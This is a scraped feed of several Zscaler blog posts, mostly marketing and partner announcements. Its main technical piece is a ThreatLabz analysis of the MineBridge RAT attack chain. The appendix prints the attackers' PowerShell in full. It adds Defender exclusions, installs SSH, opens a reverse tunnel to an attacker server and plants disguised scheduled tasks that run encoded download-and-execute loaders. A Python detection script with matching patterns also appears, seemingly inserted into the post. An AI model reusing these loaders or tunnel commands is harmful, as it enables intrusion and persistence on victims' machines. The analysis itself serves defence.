Whether you’re early in your career or you have many years under your belt, Zscaler will stretch and teach you new ways of doing things that will stay with you long after your tenure here. And last but not least, it’s the opportunity. Where else can you go to work and help address a 72 billion dollar market just over the next two to three years? It’s incredible. If you’re looking for a life-changing opportunity, want to work with a platform built for continuously evolving and learning, and grow alongside a leadership team committed to your success, explore our open opportunities. Additionally, listen to the Podcast Episode and listen to my webinar on what it means to work at Zscaler, why taking risks is essential, and how our company truly makes a difference in our customers’ lives and our people. Mon, 21 Jun 2021 12:59:55 -0700 Dali Rajic Demystifying the full attack chain of MineBridge RAT Introduction In March 2021, threat actors started distributing MineBridge RAT with an updated distribution mechanism. Morphisec blogged about the partial attack chain of this new attack but they could not find the origin or initial stages of the attack chain. In May 2021, Zscaler ThreatLabz was able to uncover all the components of this complex multi-stage attack chain which have never before been documented in their entirety in the public domain. We've blogged about MineBridge RAT before, in February 2021. This is a RAT (remote access trojan) that misuses the remote desktop software TeamViewer for DLL side-loading, enabling the threat actor to take a wide array of remote follow-on actions such as spying on users or deploying additional malware. It was first discovered in January 2020 targeting financial services organizations. We discovered that the threat actors are now distributing MineBridge RAT through Windows Installer binaries which masquerade as trading applications. 
The different stages in this sophisticated attack chain leverage Windows scheduled tasks, PowerShell scripts, reverse SSH tunnels, legitimate binaries such as TeamViewer, and shortened URLs that ultimately lead to the MineBridge RAT execution.

Attack flow

Figure 1 below illustrates the full end-to-end attack chain.

Figure 1: Complete end-to-end attack chain used to deliver MineBridge RAT

Technical analysis

On April 9th, 2021, threat actors registered the domain "tradingview[.]cyou," a look-alike of the legitimate website "tradingview[.]com." A download link for the malicious TradingView Desktop application was placed on the homepage. The official TradingView desktop application was launched by in December 2020 for the first time. This indicates that the threat actor is quick at identifying such opportunities and leveraging them in their attack chain. Within four months of the launch of the new official trading application, the threat actor registered a new domain to distribute the malicious version of the application. Similarly, other trading applications and bots often used by stock and cryptocurrency traders have also been abused by the threat actor. The complete list of file hashes is included in the IOCs section. Figures 2 and 3 below show the webpages corresponding to the malicious and legitimate domains.

Figure 2: Webpage of the malicious website

Figure 3: Webpage of the legitimate website

The download link (hxxps://tradingview[.]cyou/tradeview.php) on the attacker-controlled domain leads to the download of a malicious Windows Installer. Note: We noticed that the download URL responds with the malicious Windows Installer only if the user-agent string in the HTTP request headers corresponds to Windows 10 OS. For the purpose of technical analysis, we will look at the Windows Installer with MD5 hash: 4284ee1eef9dd7f020f5002d63def278. The installer is an Inno package which masquerades as a TradingView Desktop application and is digitally signed by YUNIVELL, LLC.
The thumbprint of the digital signature is: 93e9d0b1ea812672b825d7c6812d435cca9fff99

Figure 4 below shows the content of the Inno package.

Figure 4: Contents of the Inno setup package

By pivoting on this thumbprint, we identified a few more trading applications which are used to spread MineBridge RAT as well. The hashes of these binaries are also mentioned in the Indicators of compromise (IOCs) section. Upon execution, this installer shows a GUI (Graphical User Interface) which spoofs a TradingView application while it performs malicious activities in the background. To start malicious activities, the installer executes two PowerShell command lines which we have referred to as Stage-1 PowerShell and Stage-2 PowerShell. The operations performed by these are explained in detail in the following sections. Note: The complete code for Stage-1 PowerShell and Stage-2 PowerShell is included in Appendix I.

[+] Stage-1 PowerShell

Figure 5 below shows the relevant code section of the Stage-1 PowerShell script.

Figure 5: Stage-1 PowerShell code

Below are the main operations performed by it.
1. Changes the current directory to: "$env:programdata\ssh\"
2. Fetches the SSHD config from the shortened URL: (redirects to: and writes it to the file: sshd_config
3. Adds the OpenSSH.Server Windows capability and starts the sshd service. Sets the startup type to Automatic.
4. Changes directory to the path: "$env:userprofile" and creates the ".ssh" directory.
5. Fetches the SSH keys from the URL: (redirects to: and writes them to the file: authorized_keys
6. Fetches the RSA private keys from the URL: (redirects to: and writes them to the file: tun_id_rsa
7. Downloads the SSH client binary from the URL: (redirects to: and writes it to: ssh.exe
8. Executes the following command to set up a reverse SSH tunnel from the victim’s machine at port 109 to the attacker’s server at port 32672.
-N -R '+$RemotePort+':localhost:109 tun@'+$RemoteSrv+' -i "'+$env:userprofile+'\.ssh\tun_id_rsa" -o "StrictHostKeyChecking=no" -o "ExitOnForwardFailure=yes" -o "ServerAliveInterval=10" -o "ServerAliveCountMax=10"';

Here, $RemoteSrv: $RemotePort: 32672

Note: Reverse SSH tunnelling helps the threat actor bypass firewall rules, since outbound connection requests are generally not blocked.
9. Creates a new scheduled task with the name "OneDrive Sync" which executes the above command line upon logon, and once every 20 minutes.

[+] Stage-2 PowerShell

Figure 6 below shows the relevant code section of the Stage-2 PowerShell script.

Figure 6: Stage-2 PowerShell code

The PowerShell script performs the following operations:
1. Creates a scheduled task with the name "Google Disk Sync" which runs twice every week and executes the following code using PowerShell:
$b="https://"; $c=""; $d="/9nOFUuK"; $b+=$c; $b+=$d; $a=iwr $b -UseBasicPArsing |iex;
$b="https://"; $c=""; $d="/HxPcxuH"; $b+=$c; $b+=$d; $a=iwr $b -UseBasicPArsing |iex;
This code performs the following operations:
● Downloads and executes Stage-3 PowerShell code from: cutt[.]ly/9nOFUuK [redirects to: https://simpleclub[.]website/upd/?t=psns] which ultimately leads to NetSupport client execution.
● Downloads and executes Stage-4 PowerShell code from: cutt[.]ly/HxPcxuH [redirects to: https://simpleclub[.]site/upd/?t=pstv] which ultimately leads to MineBridge RAT execution.
2. Creates a scheduled task with the name "Google Photo Sync" which runs twice every week and executes the following PowerShell command line:
$b="https://"; $c=""; $d="/9nOFUuK"; $b+=$c; $b+=$d; $a=iwr $b -UseBasicPArsing |iex;
This again downloads and executes the Stage-3 PowerShell code from: https://cutt[.]ly/9nOFUuK [redirects to: https://simpleclub[.]website/upd/?t=psns]

Note: We have not detailed the Stage-3 PowerShell and Stage-4 PowerShell in this blog since the details for these two are already covered in the Morphisec blog.
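The Stage-1 and Stage-2 behaviours described above (Defender exclusion, OpenSSH server install, ssh -R reverse forward, masquerading task names, and a download URL assembled from string pieces before being piped to iex) can be triaged from PowerShell script-block and process-creation records. The Python below is an added example, not Zscaler's or the threat actor's code: it replays the simple assign/append statements to recover the download URL, parses the -R reverse forward, and flags the task names; all sample inputs are constructed, and the shortener host (shortener.example) and tunnel server (203.0.113.10) are placeholders.

```python
"""Triage helper for PowerShell command lines / script-block text (e.g. exported
Windows event 4104 or 4688 records) against the MineBridge Stage-1/Stage-2
tradecraft.  Added example; sample inputs are constructed with placeholder hosts."""
import re
from typing import Dict, List, Optional

# Scheduled-task names the analysis reports being used for masquerading.
MASQUERADE_TASK_NAMES = {"onedrive sync", "google disk sync", "google photo sync"}

# Behavioural indicators taken from the Stage-1/Stage-2 description.  Any one
# alone is merely suspicious; the combination is what merits an alert.
INDICATORS = [
    ("defender_exclusion", re.compile(r"Add-MpPreference\s+-ExclusionPath", re.I)),
    ("openssh_server_enabled", re.compile(r"Add-WindowsCapability\b.*?OpenSSH\.Server", re.I)),
    ("inbound_firewall_rule", re.compile(r"New-NetFirewallRule\b.*?-Direction\s+Inbound", re.I)),
    ("sshd_service_started", re.compile(r"Start-Service\s+sshd", re.I)),
    ("download_piped_to_iex", re.compile(r"\b(?:iwr|Invoke-WebRequest)\b[^|;]*\|\s*iex\b", re.I)),
    ("reverse_ssh_tunnel", re.compile(r"\bssh(?:\.exe)?\b[^;]*?\s-R\s", re.I)),
]

# PowerShell string building of the forms  $x="lit";  $x='lit';  $x=$y;  $x+=...;
ASSIGN_RE = re.compile(r'''\$(\w+)\s*(\+?=)\s*(?:"([^"]*)"|'([^']*)'|\$(\w+))\s*;''')
DOWNLOAD_VAR_RE = re.compile(r"\b(?:iwr|Invoke-WebRequest)\s+(?:-Uri\s+)?\$(\w+)", re.I)
TASK_NAME_RE = re.compile(r'''-TaskName\s+["']([^"']+)["']''', re.I)
# "-R 32672:localhost:109 tun@203.0.113.10" -> remote port, local target, server
TUNNEL_RE = re.compile(r'''-R\s+["']?(\d+):([\w.\-]+:\d+)["']?\s+(?:\S+@)?([\w.\-]+)''')


def resolve_concat_strings(script: str) -> Dict[str, str]:
    """Replay assign/append statements so a URL built from pieces (as Stage-2
    does) is recovered.  Inline expressions like $a = $b + 'x' are not evaluated."""
    env: Dict[str, str] = {}
    for m in ASSIGN_RE.finditer(script):
        name, op, dq, sq, ref = m.groups()
        if dq is not None:
            value = dq
        elif sq is not None:
            value = sq
        else:
            value = env.get(ref, "")  # unknown variable resolves to empty string
        env[name] = env.get(name, "") + value if op == "+=" else value
    return env


def recovered_download_urls(script: str) -> List[str]:
    """URLs handed to iwr/Invoke-WebRequest through a variable."""
    env = resolve_concat_strings(script)
    return sorted({env[v] for v in DOWNLOAD_VAR_RE.findall(script) if v in env})


def masquerade_task_name(script: str) -> Optional[str]:
    """The task name if it is one of the names used for masquerading, else None."""
    candidates = TASK_NAME_RE.findall(script)
    candidates += [v for k, v in resolve_concat_strings(script).items()
                   if k.lower() == "taskname"]
    for name in candidates:
        if name.strip().lower() in MASQUERADE_TASK_NAMES:
            return name
    return None


def reverse_tunnel(command_line: str) -> Optional[Dict[str, str]]:
    """Parse an ssh -R reverse forward as it appears in a process-creation record."""
    m = TUNNEL_RE.search(command_line)
    if not m:
        return None
    remote_port, local_target, server = m.groups()
    return {"server": server, "remote_port": remote_port, "local_target": local_target}


def triage(text: str) -> Dict[str, object]:
    """Score one command line or script block; 2 or more is worth analyst review."""
    hits = [name for name, rx in INDICATORS if rx.search(text)]
    task = masquerade_task_name(text)
    tunnel = reverse_tunnel(text)
    urls = recovered_download_urls(text)
    score = len(hits) + bool(task) + bool(tunnel) + bool(urls)
    return {"indicators": hits, "urls": urls, "task_name": task,
            "tunnel": tunnel, "score": score}


# Constructed samples modelled on the Stage-1 and Stage-2 code shown in the analysis.
STAGE2_SAMPLE = ('$b="https://"; $c="shortener.example"; $d="/9nOFUuK"; '
                 '$b+=$c; $b+=$d; $a=iwr $b -UseBasicPArsing |iex;')
TUNNEL_SAMPLE = ('ssh.exe -N -R 32672:localhost:109 tun@203.0.113.10 '
                 '-i C:\\Users\\victim\\.ssh\\tun_id_rsa -o StrictHostKeyChecking=no')
STAGE1_SAMPLE = ('Add-MpPreference -ExclusionPath $env:userprofile; '
                 'Add-WindowsCapability -Online -Name OpenSSH.Server~~~~; '
                 'Start-Service sshd; $TaskName = "OneDrive Sync";')
BENIGN_SAMPLE = 'Get-ChildItem $env:userprofile | Sort-Object Length'

if __name__ == "__main__":
    for sample in (STAGE2_SAMPLE, TUNNEL_SAMPLE, STAGE1_SAMPLE, BENIGN_SAMPLE):
        print(triage(sample))
```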
Zscaler Cloud Sandbox report

Figure 7 below shows the Zscaler cloud sandbox report for the MineBridge RAT DLL.

Figure 7: Cloud sandbox report

In addition to sandbox detections, Zscaler's multilayered cloud security platform detects indicators at various levels.

PS.Downloader.MINEBRIDGE
Win32.Backdoor.MINEBRIDGE

MITRE ATT&CK TTP Mapping

ID | Technique | Description
T1566 | Phishing | Attacker-hosted fake websites leading to malicious file download
T1204.002 | User Execution: Malicious File | User executes the downloaded file
T1059.001 | Command and Scripting Interpreter: PowerShell | Uses PowerShell in multiple stages to download and execute malicious payloads
T1547.001 | Registry Run Keys / Startup Folder | Creates an LNK file in the startup folder for payload execution
T1053.005 | Scheduled Task/Job: Scheduled Task | Creates scheduled tasks to execute PowerShell commands which further download and execute PowerShell scripts
T1140 | Deobfuscate/Decode Files or Information | Strings and other data are obfuscated in the payloads
T1036.004 | Masquerading: Masquerade Task or Service | Scheduled tasks are created with names masquerading as Google and OneDrive
T1036.005 | Masquerading: Match Legitimate Name or Location | Dropped LNK file for persistence masquerades as Windows Defender
T1027.002 | Obfuscated Files or Information: Software Packing | Payloads are packed in layers
T1574.002 | Hijack Execution Flow: DLL Side-Loading | Uses a legitimate TeamViewer binary with a DLL side-loading vulnerability
T1056.002 | Input Capture: GUI Input Capture | Captures the TeamViewer-generated UserID and Password by hooking GUI APIs
T1057 | Process Discovery | Verifies the name of the parent process
T1082 | System Information Discovery | Gathers system OS version info
T1033 | System Owner/User Discovery | Gathers the currently logged-in username
T1572 | Protocol Tunneling | Creates a reverse SSH tunnel
T1071.001 | Application Layer Protocol: Web Protocols | Uses HTTPS for network communication
T1041 | Exfiltration Over C2 Channel | Data is exfiltrated using the existing C2 channel

Indicators of compromise (IOCs)

[+] Hashes

MD5 | FileName | Type
4284ee1eef9dd7f020f5002d63def278 | TradingView.exe | Installer
68a010a3d0d25cfa13933199511ed897 | Polarr_Setup (2).exe | Installer
ffcd63dc98e64afbfea8718b747963d7 | Bitcoin_Trade.exe | Installer
3281f3b30fb8f3c69b18cc7aadfdf697 | Arbitrage_Bot.exe | Installer
796e091b18112e223749972c3f0888db | Bitcoin_Trade.exe | Installer
b14632304a7543752fbf2e3b7c0eca59 | msi.tiff (MineBridge RAT) | Dll

[+] C2 domains

Component | Domain
Phishing website | tradingview[.]cyou, tradingview[.]cloud, tradingview[.]digital, tradingview[.]life
PowerShell payloads | cloud-check[.]website, simpleclub[.]website, simpledomen[.]website, simpleclub[.]site
Reverse SSH tunnel | 86.106.181[.]183:32672
NetSupport client | update-system[.]cn, updatesystem[.]website
MineBridge RAT | ninjakick[.]club, polarrsearch[.]xyz, rogaikopyta[.]xyz, utkailipa[.]xyz, 5tvstar[.]cn, goldendragon888[.]cn

[+] Windows Installer signer details

Signer name: YUNIVELL, LLC
Thumbprint: 93E9D0B1EA812672B825D7C6812D435CCA9FFF99

[+] Scheduled task names

OneDrive Sync
Google Disk Sync
Google Photo Sync

Appendix I

[+] Stage-1 PowerShell

Add-MpPreference -ExclusionPath $env:userprofile;
$LocalPort = 109;
cd "$env:programdata\ssh\";
$HomeURL = '';
$FileCfg = 'sshd_config';
$LinkCfg = $HomeURL;
$LinkCfg += 'UxtdKtn';
Invoke-WebRequest -Uri $LinkCfg -OutFile $FileCfg;
Add-WindowsCapability -Online -Name OpenSSH.Server~~~~;
New-NetFirewallRule -Name sshd -DisplayName 'Security Updater' -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort $LocalPort;
Start-Service sshd;
Set-Service -Name sshd -StartupType 'Automatic';
$RemotePort = 32672;
$RemoteSrv = '';
$TaskName = "OneDrive Sync";
$System32 = $env:systemroot+'\system32';
cd "$env:userprofile";
mkdir '.ssh';
cd '.ssh';
$HomeURL = '';
$LinkKey = $HomeURL+'Zxtd1Kl';
$FileKey = $(get-location).Path+'\authorized_keys';
if(![System.IO.File]::Exists($FileKey)){Invoke-WebRequest -Uri $LinkKey -OutFile $FileKey;}
$LinkRSA = $HomeURL+'yxtdOo3';
$FileRSA = $(get-location).Path+'\tun_id_rsa';
if(![System.IO.File]::Exists($FileRSA)){Invoke-WebRequest -Uri $LinkRSA -OutFile $FileRSA;}
icacls.exe $FileRSA /reset;
icacls.exe $FileRSA /grant:r "$($env:username):(r)";
icacls.exe $FileRSA /inheritance:r;
$LinkSSH = $HomeURL+'ubfAKPb';
$SSH="$env:userprofile\.ssh";
if($env:path -ne $SSH){$env:path += ";$SSH";setx PATH "$env:path;$SSH";echo $env:path;}
$SSH+="\ssh.exe";
if(![System.IO.File]::Exists($SSH)){Invoke-WebRequest -Uri $LinkSSH -OutFile $SSH -UseBasicPArsing;}
$SSH="ssh.exe";
$Arguments = '-N -R '+$RemotePort+':localhost:109 tun@'+$RemoteSrv+' -i "'+$env:userprofile+'\.ssh\tun_id_rsa" -o "StrictHostKeyChecking=no" -o "ExitOnForwardFailure=yes" -o "ServerAliveInterval=10" -o "ServerAliveCountMax=10"';
$ActionX = New-ScheduledTaskAction -Execute $SSH -Argument $Arguments;
$PrincipalX = New-ScheduledTaskPrincipal -UserID $env:UserName -LogonType S4U -RunLevel Limited;
$TriggerX = New-ScheduledTaskTrigger -AtLogOn;
$TriggerC = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 20);
$task = New-ScheduledTask -Action $ActionX -Principal $PrincipalX -Trigger $TriggerX,$TriggerC;
if($(Get-ScheduledTask -TaskName $TaskName -ErrorAction SilentlyContinue).TaskName -eq $TaskName){Unregister-ScheduledTask -TaskName $TaskName -Confirm:$False}
Register-ScheduledTask $TaskName -InputObject $task;
Start-ScheduledTask -TaskName $TaskName;

[+] Stage-2 PowerShell

Add-MpPreference -ExclusionPath $env:userprofile;
$T = Get-Date;
$D1 = $T.DayOfWeek;
$D2 = $T.AddDays(3);
$D2 = $D2.DayOfWeek;
$T1 = $T.AddMinutes(8);
$TR = New-ScheduledTaskTrigger -At $T1 -Weekly -DaysOfWeek $D1,$D2;
$A = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-ep bypass -w hidden -nop -enc JABiAD0AIgBoAHQAdABwAHMAOgAvAC8AIgA7AAoAJABjAD0AIgBjAHUAdAB0AC4AbAB5ACIAOwAKACQAZAA9ACIALwA5AG4ATwBGAFUAdQBLACIAOwAKACQAYgArAD0AJABjADsACgAkAGIAKwA9ACQAZAA7AAoAJABhAD0AaQB3AHIAIAAkAGIAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAEEAcgBzAGkAbgBnACAAfABpAGUAeAA7AAoAJABiAD0AIgBoAHQAdABwAHMAOgAvAC8AIgA7AAoAJABjAD0AIgBjAHUAdAB0AC4AbAB5ACIAOwAKACQAZAA9ACIALwBIAHgAUABjAHgAdQBIACIAOwAKACQAYgArAD0AJABjADsACgAkAGIAKwA9ACQAZAA7AAoAJABhAD0AaQB3AHIAIAAkAGIAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAEEAcgBzAGkAbgBnACAAfABpAGUAeAA7AA==";
Register-ScheduledTask -TaskName "Google Disk Sync" -Trigger $TR -User $env:UserName -Action $A -RunLevel Highest -Force;
$T2 = $T.AddMinutes(12);
$TR2 = New-ScheduledTaskTrigger -At $T2 -Weekly -DaysOfWeek $D1,$D2;
$A2 = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-ep bypass -w hidden -nop -enc JABiAD0AIgBoAHQAdABwAHMAOgAvAC8AIgA7AAoAJABjAD0AIgBjAHUAdAB0AC4AbAB5ACIAOwAKACQAZAA9ACIALwA5AG4ATwBGAFUAdQBLACIAOwAKACQAYgArAD0AJABjADsACgAkAGIAKwA9ACQAZAA7AAoAJABhAD0AaQB3AHIAIAAkAGIAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAEEAcgBzAGkAbgBnACAAfABpAGUAeAA7AA==";
Register-ScheduledTask -TaskName "Google Photo Sync" -Trigger $TR2 -User $env:UserName -Action $A2 -RunLevel Highest -Force;

Thu, 24 Jun 2021 11:03:30 -0700 Sudeep Singh

Revolutionize DEM with 360-Degree Monitoring for the Cloud Era

Imagine watching an action movie with only one fixed camera angle. It would be an incredibly frustrating experience. Not only would your understanding of scenes be limited, but you would need to extrapolate the storyline from incomplete data. The same can be said for some digital experience monitoring (DEM) solutions. The efficacy of any monitoring solution lies in how many different angles the solution uses to instrument and collect data. Most monitoring solutions have single points of instrumentation: an agent installed on a workload or the end user's device. Some solutions are hardware-based, using appliances in a data center to collect data.
The problem with the “single angle” solutions above is you must place a “camera” at the endpoint or workload to instrument it. And to do that, you need direct ownership of those elements to monitor data from that perspective. In highly distributed environments, where users can be anywhere, and applications are hosted in cloud infrastructure, and there isn’t direct ownership of the infrastructure, this is a significant limitation. Enter Zscaler Digital Experience (ZDX). ZDX is Zscaler’s digital experience monitoring solution that leverages Zscaler’s extensive global footprint of 150 data centers—Zscaler’s Zero Trust Exchange—that form the world’s largest security cloud (these internet-edge data centers process over 160 billion transactions a day). Thus, the ZDX solution is built as a monitoring overlay directly onto the existing Zscaler Internet Access and Zscaler Private Access platforms. It leverages the same Zscaler Client Connector agent that provides cyberthreat protection, data protection, and zero trust remote access. There are approximately 20 million Client Connector agents deployed among Zscaler customers worldwide. ZDX is unique because it uses these widely deployed agents and the global Zero Trust Exchange as 360-degree instrumentation points (as seen in Figure 1). Figure 1: Zscaler’s Zero Trust Exchange with points of telemetry They act as unique telemetry sources, providing visibility into the end-user performance from multiple camera angles—from the end-user’s perspective looking out and from the cloud’s perspective looking in. It’s a little like the 360-degree camera work from The Matrix. Figure 2: A 360-degree view of the action This 360-degree telemetry affords two unique advantages: Ubiquitous performance monitoring at scale. ZDX can regularly probe the performance of your entire employee base by accessing critical internal and external applications (typically every five minutes). 
While having this visibility and data is incredible, you might wonder about the impact these transactions have on your applications. The good news is that there is minimal impact due to Zscaler’s inline proxy architecture. Web probe traffic is proxied and cached by the Zero Trust Exchange, so there is never a one-to-one ratio of endpoints to web hits but a significantly reduced one-to-many ratio (see Figure 3). Figure 3: Cached web probe traffic 360 Degree CloudPath. CloudPath provides path visualization and telemetry of the user’s traffic path, leveraging Client Connector from the endpoint to its egress to the destination over the Zscaler cloud. This includes the tunnel through a ZIA or ZPA Public Service Edge. So far, so good, but what makes CloudPath special? The Zscaler Zero Trust Exchange provides ZDX with a unique path analysis from multiple angles. It measures the perspective from the end user’s outbound path, the Zscaler Zero Trust Exchange inbound, and Zscaler Zero Trust Exchange to the application (see Figure 4). Figure 4: CloudPath stitches three separate traces into one All of these views are stitched together for maximum granularity and accuracy that is proxy-aware. This results in highly detailed end-to-end path analysis to pinpoint where performance issues are coming from (see Figure 5) that other solutions cannot replicate. Figure 5: A proxy-aware granular view A Digital Experience Monitoring solution is a must-have in the work-from-anywhere world. Selecting a solution means considering the unique advantages afforded by an inline proxy architecture. When the power of your monitoring solution depends on instrumentation that shows you every angle of the action, having the Zero Trust Exchange footprint at your disposal makes all the difference. Check out Zscaler’s ZDX solution, and reach out for a solution expert to discuss how ZDX can help you monitor all the action from every angle. 
Tue, 22 Jun 2021 08:00:01 -0700 Sanjit Ganguli Introducing New Partner Certifications and Learning Formats! Introducing New Partner Certifications Zscaler is pleased to announce new pre-sales certifications featuring all-new content and interactive learning opportunities. These courses were specifically designed to give partners the chance to roll up their sleeves and uncover new ways to grow their business with Zscaler. At Zscaler, we believe our partners are crucial to our success. We recognize we must work in conjunction with our partners to spread the word about the possibilities of adopting a zero trust security model. Zscaler Certified Associate (ZCA) Zscaler Certified Associate overviews the goals and vision of Zscaler, including what we do, the value we offer customers, and our mission for future network and security transformation. Partners will learn how Zscaler is uniquely positioned to disrupt the status quo of hub-and-spoke network security and how to join us on the incredible journey. ZCA serves as a prerequisite for both the Zscaler Certified Sales Professional (ZCSP) and the Zscaler Certified Sales Engineer (ZCSE) certifications and replaces the existing Zscaler Certified Sales Specialist (ZCSS) certification. Zscaler Certified Sales Professional (ZCSP) Zscaler Certified Sales Professional is designed to familiarize partner sellers with how to best position Zscaler as the market’s leading network and cloud security solution. In this certification, partners will learn how to identify and qualify opportunities as well as the technical integrations we have in place to help you position Zscaler as part of a holistic solution. Partners will also dive into the four core product areas for the Zero Trust Exchange platform. The new ZCSP certification is valid for two years upon completion. 
Zscaler Certified Sales Engineer (ZCSE) This certification is built for those in pre-sales technical roles, specifically designed to get participants up to speed on how to best showcase Zscaler’s technical value and differentiation. In this certification, partners will take a deep dive into Zscaler’s core product offerings to understand the key capabilities of the zero trust platform and how customers can realize the benefits in their unique environments. Participants will also catch a glimpse into a security administrator’s experience, including policies, reporting tools, technical integrations, and the end-user experience. The new ZCSE certification is valid for two years upon completion. What are the Benefits of Becoming Zscaler Certified? Zscaler certifications are designed to arm partners with the most up-to-date information about our products, strategies, and thought leadership so they can effectively communicate the value of our end-to-end zero trust security platform. By becoming Zscaler certified, partners will increase their credibility with customers by helping them accelerate their highest priority IT initiatives, all while reducing cost and simplifying their environments. With Zscaler, partners can expect to expand their book of business by providing the holistic and integrated solution packages their customers want and need. If you are a partner looking to enroll in Zscaler Training & Certifications, log in to our Partner Portal at and click on the Enablement tab. Tue, 22 Jun 2021 07:00:01 -0700 Rick Kickert We’re Pleased to Announce our 2021 Partner Award Winners This year we’re celebrating our very first Zscaler Partner Awards, honoring our “zero trust heroes” who’ve gone above and beyond in their partnership with Zscaler to help our mutual customers embrace digital transformation. Who’ll be taking home the trophies? Let’s find out! 
Americas Partner of the Year Like all of the awards announced, selecting a winner is the result of in-depth deliberation. With that said, the Americas Partner of the Year winner leads with transformation and leverages this principle to build strong customer relationships with advisory consulting. This partner also is being recognized for approaching zero trust with a focus on identity-based security policies rather than network. Therefore, we’re happy to announce that OPTIV is the Zscaler Americas Partner of the Year. APJ Partner of the Year Our APJ Partner of the Year winner signed a global contract with Zscaler in 2018, and the level of executive and field engagement continues to be outstanding, significantly contributing to Zscaler’s reach and success in this region. With the highest number of Zscaler certifications globally, this partner delivers strong partner-sourced performance in Japan by landing both domestic and global accounts. Our APJ Partner of the Year is NTT Communications Corporation. EMEA Partner of the Year Our EMEA Partner of the Year was entirely self-sufficient from pipeline generation through proof-of-value. By investing in Zscaler Certifications to up-level their technical expertise, and by hosting quarterly webinar campaigns yielding an average of ten new leads per quarter, Avantec AG has been selected as our EMEA Partner of the Year. Public Sector Partner of the Year With a focus on new business meetings and consistently executing interlocks and integrated field engagements, our Public Sector Partner of the Year consistently exceeds business objectives—especially when delivering Zscaler services to key strategic accounts. Our Public Sector Partner of the Year is ThunderCat Technology. Global Solution Integrator Partner of the Year As one of our most prominent end-user customers, this partner leverages ZIA and ZPA to enable their employees to work securely from anywhere. 
In addition, Zscaler is this partner’s exclusive GTM partner for web security and zero trust, and closed several large new logos across several verticals last year. As an outstanding partner in Central Europe with expansion plans to other regions, Zscaler’s Global System Integrator Partner of the Year is Tata Consulting Services. Services Partner of the Year Over the last year, this partner has subcontracted and delivered on a large number of projects and offers a robust set of U.S. federal and commercial expertise. More notable is that most of this partner’s deployments are completed in 90 days or less, with consistently high customer satisfaction ratings. Our Services Partner of the Year is Ridge IT. Service Provider Partner of the Year This year’s winner is our second-largest global partner for new sourced business, growing even more in 2020 and delivering balanced performance across all regions. This partner also landed two of our five largest sourced ZIA deals. Our Service Provider Partner of the Year is Verizon. Zero Trust Technology Partner of the Year Microsoft has been out in front of the industry in its call for the adoption of zero trust to enable the modern workplace, close security gaps, and accelerate digital transformation. It is closely aligned with Zscaler in the belief that zero trust isn’t a single solution, but rather a strategy that should extend across a company’s digital estate. Microsoft is on its own zero trust journey, applying the principles of least-privileged access, explicit authentication, and the prevention of lateral movement across its ecosystem, while educating customers about these key requirements to help them improve their security postures as they move to the cloud and support a mobile workforce. Congratulations to Microsoft, our Zero Trust Technology Partner of the Year. 
The Go-to-Market Technology Partner of the Year One of our top GTM Technology Partners, this partner helps us deliver incredible value to large global organizations. This award recognizes our relentless focus on securing work beyond the perimeter and co-developed innovations, enabling our customers to seamlessly and securely shift to remote and hybrid work. Congratulations to our Go-to-Market Partner of the Year, CrowdStrike. Customer-Centric Technology Partner of the Year This award recognizes our shared commitment to customer obsession and improving customer experiences, which is reimagining how businesses can drive successful outcomes and reduce costs, while balancing security with user experience. Congratulations to the team at AWS. Congratulations to all of our winners! Thank you for your continued partnership and driving success with our joint customers. For more information on our Summit partner program visit and watch the replay of Partner Summit at Zenith Live. Mon, 21 Jun 2021 08:40:53 -0700 Punit Minocha Blocking the Unknown Threat with Machine Learning This post also appeared on LinkedIn. Finding the needle in the haystack is difficult enough as it is. Finding the unknown threat in 160 billion transactions a day is like trying to find a single needle in a million haystacks...and you don’t know what a needle looks like. I am glad to blog about the intriguing work my Machine Learning and AI teammates have done along with our amazing colleagues from the Security Research, Engineering, and PM team. Thanks to the team effort that made this article possible! Most security professionals are quite capable of stopping known threats: Is the signal recognized? Block it. But how do you block something you haven’t seen before? Identifying threats in inbound and outbound traffic is like trying to find a needle in a proverbial haystack. It’s challenging, but it’s something Zscaler has been doing for more than a decade. 
Every day, Zscaler enables and inspects more than 160 billion transactions. Thanks to more than 175,000 daily new security updates, about 100 million threats are detected every day for our customers. Among them, some are known threats and some are unknown threats.

Everything to know about unknown threats

Unknown threats are threats that haven’t been documented or detected before. They arrive in a system without a known identifiable signal such as an IoC (Indicator of Compromise) or signature. Sometimes they are variations of known threats — say, a variant of a well-known ransomware strain — and sometimes they are brand new, previously unseen, or original threats.

Blocking unknown threats requires an innovative approach to security. The Zscaler Zero Trust Exchange employs innovations such as Cloud Sandbox (CSB) and Cloud Browser Isolation (CBI) services to sequester the unknown bad. On top of that, the Zscaler ML/AI team has been collaborating closely with our security research and security engineering teams to develop advanced technology that complements the existing CSB and CBI solutions and combats unknown threats more easily, effectively, and efficiently.

Without a signal to act upon, unknown threats are understandably more difficult to block. We have to correlate and stitch together many other signals from transactions, sometimes over a long period. This can be difficult to put into practice, especially with such massive data volumes. We need to transform such an NP-hard-like problem into something more actionable and manageable without compromising unknown threat detection. At Zscaler, we started leveraging Machine Learning and AI technology to filter the petabytes of data, leaving us with a much smaller volume so that our deeper analysis of the transactions (some based on tried-and-true conventional technology and some based on the AI model) is feasible, practical, and effective.

Zscaler Machine Learning and AI tools in practice

Let’s look at some examples. The first example is unknown web-page categorization by AI/ML. At Zscaler, we use AI to categorize an unknown page as “Education”, “Weapons/Bombs”, or whatever category applies. We can do this even if we have never seen or labeled the page before. This smart capability — honed from complex algorithmic AI logic running behind the scenes — enables us to figure out some of the “good” and “bad” sites simply by using our proprietary categorization model.

The second example is unknown web-page risk analysis by AI/ML. There is a subtle difference here, as we do risk assessment rather than page categorization. In fact, our Zscaler cloud service has already been scoring web page destinations in production for years, and now AI/ML can make that quantification even better and stronger via a domain reputation model. Let's look at this example in detail below.

The ML-based domain reputation model

